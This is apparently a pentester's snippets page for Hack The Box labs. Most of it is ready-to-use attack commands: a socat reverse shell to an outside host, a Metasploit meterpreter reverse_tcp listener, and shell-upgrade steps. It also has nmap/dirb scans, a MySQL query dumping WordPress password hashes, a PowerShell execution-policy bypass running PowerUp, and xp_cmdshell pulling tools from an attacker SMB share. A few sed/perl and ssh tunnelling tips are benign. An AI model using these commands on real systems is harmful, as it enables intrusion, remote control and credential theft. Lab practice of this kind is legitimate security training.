Skip to content

Snippets

Get tab auto-completion in reverse shell

python -c 'import pty; pty.spawn("/bin/bash");'     # python3 -c 'import pty; pty.spawn("/bin/bash");'
# ^Z (background shell with ctrl+z)
stty raw -echo
fg      #(to foreground the shell)
stty rows 45 cols 205

#### Fix TERM variable to allow clear
export TERM=xterm-256color

Another nmap approach

nmap -F 10.10.10.22 #find ports nmap -A -p22,80,443 10.10.10.22 #scan those ports

Metasploit Listener

# unicorn.rc
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.14.22
set LPORT 1337
set ExitOnSession false
set EnableStageEncoding true
exploit -j


msfconsole -r unicorn.rc

export IP_ADR="10.10.10.40"
cd ~/Documents/htb/boxes/

tmux
openvpn /root/Documents/htb/Glasgow.ovpn

#tmux new-window -c "#{pane_current_path}"

nmap -sC -sV -oA nmap $IP_ADR

nmap -T4 -A -v $IP_ADR

uniscan -u $IP_ADR -qweds

dirb http://$IP_ADR /usr/share/wordlists/dirb/common.txt -o dirb_output.txt

Socat Commands

# listener
socat file:`tty`,raw,echo=0 tcp-listen:4444
socat file:`tty`,raw,echo=0 tcp-listen:4447,reuseaddr

# port forward
socat TCP-LISTEN:9992,fork TCP:10.10.14.22:9992 &

# reverse shell
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:172.19.0.4:9992 &

ssh port forwarding

https://www.ssh.com/ssh/tunneling/example

ssh -L <localport>:<remote_address_to_forward_to>:<remote_port> user@ssh-ip-address

Remove 1st line from output

sed '1d' file.txt > tmpfile; mv tmpfile file.txt # POSIX
sed -i '1d' file.txt # GNU sed only, creates a temporary file

perl -ip -e '$_ = undef if $. == 1' file.txt # also creates a temporary file

connecting to mysql database & extracting wp hashes

mysql --host=HOSTNAME --user=USERNAME --password=PASSWORD

use wp
select concat_ws(':', user_login, user_pass) from wp_users;

run powershell script function from cmd

powershell.exe -exec bypass -Command "& {Import-Module C:\Users\mssql-svc\Desktop\PowerUp.ps1; Invoke-AllChecks}"

Use impacket-smbserver to send files to box:

impacket-smbserver -smb2support files `pwd`

xp_cmdshell xcopy \\10.10.14.25\files\PowerUp.ps1 C:\Users\mssql-svc\Desktop\